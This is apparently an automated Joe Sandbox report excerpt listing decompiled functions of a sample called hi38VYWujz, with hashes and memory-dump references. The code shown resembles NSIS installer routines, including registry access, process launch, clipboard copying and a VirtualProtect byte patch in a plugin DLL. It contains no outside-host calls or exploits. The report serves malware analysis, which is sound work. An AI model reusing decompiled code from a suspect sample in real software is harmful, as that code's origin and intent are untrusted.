Instruction Fuzzy Hash: 7DE0EC3222425EABDF509E559C04EEB7B6DEF05360F048837FD15E7160D631E921ABA8

Uniqueness

Uniqueness Score: -1.00%

Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
					 *0x1000405c = 0xc2;
					 *0x1000404c = 0;
					 *0x10004054 = 0;
					 *0x10004068 = 0;
					 *0x10004058 = 0;
					 *0x10004050 = 0;
					 *0x10004060 = 0;
					 *0x1000405e = 0;
				}
				return 1;
			}

0x100027cb
0x100027d0
0x100027e0
0x100027e8
0x100027ef
0x100027f4
0x100027f9
0x100027fe
0x10002803
0x10002808
0x1000280d
0x1000280d
0x10002815

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0

Memory Dump Source

Source File: 00000006.00000002.45232552637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.45232522122.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.45232596193.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.45232631278.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_hi38VYWujz.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19

Uniqueness

Uniqueness Score: -1.00%

Function 004060CC Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060CC(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406051(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004060d6
0x004060dd
0x004060f0
0x00000000
0x004060f0
0x004060e1
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F00,?,?,0040615A,007A0F00,00000000,?,?,Call,?), ref: 004060F0

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: ced63528db1e32a5bcf3a8a8acf2bd7baad3650648e26365f6afbd74657f9209
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: BED0123208020DBBDF219F909D01FAB375DAB04354F018436FE06E4190DB76D570AB14

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402C37(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x00402885
0x00402885
0x00402ac2
0x00402ace

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 6eb76b24ce870ef992c4327a1b2b518c4e6cabc1d7ccad815c10311b33b2bb2a
Instruction ID: 129b57beed9750de1dc8ac5f086523220a35585882bce30df6ddda6966387252
Opcode Fuzzy Hash: 6eb76b24ce870ef992c4327a1b2b518c4e6cabc1d7ccad815c10311b33b2bb2a
Instruction Fuzzy Hash: DFD01272B04104DBDB51DBE4AF0859D72A5AB50364B208577E101F11D1DABD89549B19

Uniqueness

Uniqueness Score: -1.00%

Function 004041F4 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041F4(intOrPtr _a12) {
				intOrPtr _v0;
				struct HWND__* _v4;
				int _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_t7 = SetDlgItemTextW(_v4, _v0 + 0x3e8, E00406281(_t8, _t9, _t10, 0, _a12)); // executed
				return _t7;
			}

0x0040420e
0x00404213

APIs

SetDlgItemTextW.USER32(?,?,00000000), ref: 0040420E

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: ItemText
String ID:
API String ID: 3367045223-0
Opcode ID: 73c06e2a9123b891731a7ebfb9029f8f008127f7581a586f7a1d4e0a57963b9e
Instruction ID: f5da9590e85ea14362a2b992ac95bea4d8dfad4da802ef44e2657ae46e782bfa
Opcode Fuzzy Hash: 73c06e2a9123b891731a7ebfb9029f8f008127f7581a586f7a1d4e0a57963b9e
Instruction Fuzzy Hash: 13C04C76548200BFD682B755CC42F1FB799EF94315F04C52EB59DE11D1CA3584319A26

Uniqueness

Uniqueness Score: -1.00%

Function 00403308 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403308(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403316
0x0040331c

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403316

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00404229 Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404229(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x7a8a28, 0x28, _a4, "true"); // executed
				return _t2;
			}

0x00404237
0x0040423d

APIs

SendMessageW.USER32(00000028,?,?,00404054), ref: 00404237

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09

Uniqueness

Uniqueness Score: -1.00%

Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401F00() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402C37(_t15);
				E004052C3(0xffffffeb, _t7);
				_t9 = E00405844(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x20)) != _t15) {
						_t13 = E004066EA(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x24)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004061A6( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401f06
0x00401f0b
0x00401f11
0x00401f16
0x00401f1a
0x00402885
0x00401f20
0x00401f23
0x00401f26
0x00401f2e
0x00401f3d
0x00401f3f
0x00401f3f
0x00401f30
0x00401f34
0x00401f34
0x00401f2e
0x00401f46
0x00401f47
0x00401f47
0x00402ac2
0x00402ace

APIs

Part of subcall function 004052C3: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,75ED23A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
Part of subcall function 004052C3: lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,75ED23A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
Part of subcall function 004052C3: lstrcatW.KERNEL32(007A0F00,0040323B), ref: 0040531E
Part of subcall function 004052C3: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
Part of subcall function 004052C3: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
Part of subcall function 004052C3: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
Part of subcall function 004052C3: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E

Part of subcall function 00405844: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 0040586D
Part of subcall function 00405844: CloseHandle.KERNEL32(?), ref: 0040587A

CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401F47

Part of subcall function 004066EA: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401EFB,?,?,?,?,?,?), ref: 004066FB
Part of subcall function 004066EA: GetExitCodeProcess.KERNEL32(?,?), ref: 0040671D

Part of subcall function 004061A6: wsprintfW.USER32 ref: 004061B3

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 9645f34456babddffe365cced8570490a305f219a8dabac6956c86f0a67676f6
Instruction ID: 4cd38a76db1ec19436dc127f491775ffefe8ed04147ea9162fb687742d6809c2
Opcode Fuzzy Hash: 9645f34456babddffe365cced8570490a305f219a8dabac6956c86f0a67676f6
Instruction Fuzzy Hash: 63F09032905111DBCF20FBA19E849DE66B4AF01328B25457BF501F61D1C77C4E518AAE

Uniqueness

Uniqueness Score: -1.00%

Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000121B() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
				return _t3;
			}

0x10001225
0x1000122b

APIs

GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

Memory Dump Source

Source File: 00000006.00000002.45232552637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.45232522122.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.45232596193.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.45232631278.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_hi38VYWujz.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405402 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405402(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x7a7a04;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405396, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406281(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x7a1f20;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x7a79ec == _t156) {
							ShowWindow( *0x7a8a28, 8);
							if( *0x7a8acc == _t156) {
								E004052C3( *((intOrPtr*)( *0x7a0ef8 + 0x34)), _t156);
							}
							E004041CD(_t171);
							goto L25;
						}
						 *0x7a06f0 = 2;
						E004041CD(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040425B(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a79f0, _t156);
						ShowWindow(_t169, 8);
						E00404229(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x7a8a34;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x7a79f0 = GetDlgItem(_a4, 0x403);
				 *0x7a79e8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x7a7a04 = _t134;
				_v8 = _t134;
				E00404229( *0x7a79f0);
				 *0x7a79f4 = E00404B60(4);
				 *0x7a7a0c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004041F4(_a4);
				if(( *0x7a8a3c & 0x00000003) != 0) {
					ShowWindow( *0x7a79f0, _t156);
					if(( *0x7a8a3c & 0x00000002) != 0) {
						 *0x7a79f0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404229( *0x7a79e8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x7a8a3c & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x0040540a
0x00405410
0x0040541a
0x0040541d
0x004055b3
0x004055d7
0x004055d7
0x004055ea
0x00405608
0x0040560a
0x00405612
0x00405668
0x0040566c
0x00000000
0x00000000
0x0040566e
0x00405674
0x00000000
0x00000000
0x0040567e
0x00405686
0x00405689
0x0040578b
0x00000000
0x0040578b
0x00405698
0x004056a3
0x004056ac
0x004056b7
0x004056ba
0x004056c3
0x004056c9
0x004056cc
0x004056cc
0x004056e4
0x004056ed
0x004056f0
0x004056f7
0x004056fe
0x00405706
0x00405706
0x0040571d
0x0040571d
0x00405724
0x0040572a
0x00405736
0x0040573d
0x00405746
0x00405748
0x0040574b
0x0040575a
0x0040575d
0x00405763
0x00405764
0x0040576a
0x0040576b
0x0040576c
0x00405774
0x0040577f
0x00405785
0x00405785
0x00000000
0x004056e4
0x0040561a
0x0040564a
0x00405652
0x0040565d
0x0040565d
0x00405663
0x00000000
0x00405663
0x0040561e
0x00405628
0x00000000
0x004055ec
0x004055f2
0x0040562d
0x00000000
0x00405636
0x004055fb
0x00405600
0x00405603
0x00000000
0x00405603
0x004055ea
0x00405423
0x00405427
0x0040542f
0x00405433
0x00405436
0x00405439
0x0040543c
0x0040543f
0x00405440
0x00405441
0x0040545a
0x0040545d
0x00405467
0x00405476
0x0040547e
0x00405486
0x0040548b
0x0040548e
0x0040549a
0x004054a3
0x004054ac
0x004054ce
0x004054d4
0x004054e5
0x004054ea
0x004054f8
0x00405506
0x00405506
0x0040550b
0x00405519
0x00405519
0x0040551e
0x00405521
0x00405526
0x00405532
0x0040553b
0x00405548
0x00405557
0x0040554a
0x0040554f
0x0040554f
0x00405563
0x00405563
0x00405577
0x00405580
0x00405589
0x00405599
0x004055a5
0x004055a5
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00405460
GetDlgItem.USER32(?,000003EE), ref: 0040546F
GetClientRect.USER32(?,?), ref: 004054AC
GetSystemMetrics.USER32(00000002), ref: 004054B3
SendMessageW.USER32(?,00001061,00000000,?), ref: 004054D4
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054E5
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054F8
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405506
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405519
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040553B
ShowWindow.USER32(?,00000008), ref: 0040554F
GetDlgItem.USER32(?,000003EC), ref: 00405570
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405580
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405599
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055A5
GetDlgItem.USER32(?,000003F8), ref: 0040547E

